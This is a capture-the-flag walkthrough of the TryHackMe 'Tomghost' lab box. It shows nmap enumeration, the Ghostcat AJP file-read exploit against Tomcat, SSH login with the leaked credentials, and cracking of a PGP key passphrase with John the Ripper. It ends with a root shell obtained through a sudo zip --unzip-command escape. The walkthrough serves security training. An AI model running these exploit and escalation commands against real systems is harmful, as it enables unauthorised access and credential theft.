Tomghost - TryHackMe Walkthrough

Identify recent vulnerabilities to try exploit the system or read files that you should not have access to. This is a TryHackMe box. To access this you must sign up to https://tryhackme.com/.

URL: tomghost

Difficulty: Easy

Author: stuxnet

Enumeration

We are given the IP 10.10.31.90. Run an nmap scan with the following command:

nmap -p- -A -o portscan 10.10.31.90

These are the open ports:

PORT     STATE SERVICE    VERSION
22/tcp   open  ssh        OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 f3:c8:9f:0b:6a:c5:fe:95:54:0b:e9:e3:ba:93:db:7c (RSA)
|   256 dd:1a:09:f5:99:63:a3:43:0d:2d:90:d8:e3:e1:1f:b9 (ECDSA)
|_  256 48:d1:30:1b:38:6c:c6:53:ea:30:81:80:5d:0c:f1:05 (ED25519)
53/tcp   open  tcpwrapped
8009/tcp open  ajp13      Apache Jserv (Protocol v1.3)
| ajp-methods: 
|_  Supported methods: GET HEAD POST OPTIONS
8080/tcp open  http       Apache Tomcat 9.0.30
|_http-favicon: Apache Tomcat
|_http-title: Apache Tomcat/9.0.30

nmap

Here is port 8080 on my browser:

8080

This seems to just be the Apache installation index page.

I have never seen port 8009 open, so I will investigate this.

AJP is a wire protocol. It an optimized version of the HTTP protocol to allow a standalone web server such as Apache to talk to Tomcat.

By default, Apache Tomcat listens on 3 ports, 8005, 8009 and 8080. A common misconfiguration is blocking port 8080 but leaving ports 8005 or 8009 open for public access.

I will be using this tool on github to exploit this vulnerability:

00theway/Ghostcat-CNVD-2020-10487

Let’s download the raw code onto our local machine:

wget https://raw.githubusercontent.com/00theway/Ghostcat-CNVD-2020-10487/master/ajpShooter.py

wget

We have the script ajpShooter.py.

This is the command to read a file:

python3 ajpShooter.py http://10.10.31.90:8080 8009 /WEB-INF/web.xml read

read

There are some credentials:

skyfuck:8********************s

We saw earlier that port 22 was open, let’s try and ssh using the credentials we just discovered. The password seems to just be plaintext, I don’t recognise any encryption.

ssh [email protected]

ssh

We are successfully logged in as skyfuck.

The home directory has another user called merlin. We also have the user flag.

cd ..
ls
cd merlin
cat user.txt

flag

Privilege Escalation

I noticed a pgp file in skyfuck’s home directory:

pgp

We also have tryhackme.asc which has a PGP PRIVATE KEY BLOCK:

asc

I will transfer these files to my local machine so I can attempt to decrypt the file.

scp [email protected]:/home/skyfuck/* .

scp is a way to transfer files across a network using ssh. Read more about this here:

Secure Copy - ssh scp

Here is a youtube video explaining how to crack a PGP Private Key Password.

John the Ripper: How to Recover Your PGP Private Key Password

We will be converting the tryhackme.asc file using the tool gpg2john.

gpg2john tryhackme.asc > hash

This is what my hash file contains:

tryhackme:$gpg$*17*54*3072*713ee3f57cc950f8f89155679abe2476c62bbd286ded0e049f886d32d2b9eb06f482e9770c710abc2903f1ed70af6fcc22f5608760be*3*254*2*9*16*0c99d5dae8216f2155ba2abfcc71f818*65536*c8f277d2faf97480:::tryhackme <[email protected]>::tryhackme.asc

Now let’s use john to crack this file. I used the rockyou.txt wordlist.

john --wordlist=/usr/share/wordlists/rockyou.txt hash

We have some results:

results john

Now that we have this key, let’s go back to the ssh session and decrypt the pgp key.

gpg --import tryhackme.asc
gpg --decrypt credential.pgp

decrypt

We have some credentials:

merlin:a*************************************************************j

Change the user and use those credentials:

su merlin

su

Check to see the users sudo rights:

sudo -l

sudo l

We need to priv esc using the zip binary. I did some research on ZIP Privilege Escalation and found this article:

ZIP exploitation

So let’s create a new file with touch:

touch f3dai.txt

Then exploit this using the following command:

sudo zip 1.zip f3dai.txt -T --unzip-command="sh -c /bin/bash"

zip exploit

We have spawned a root shell, and found the root flag.

Written on June 5, 2020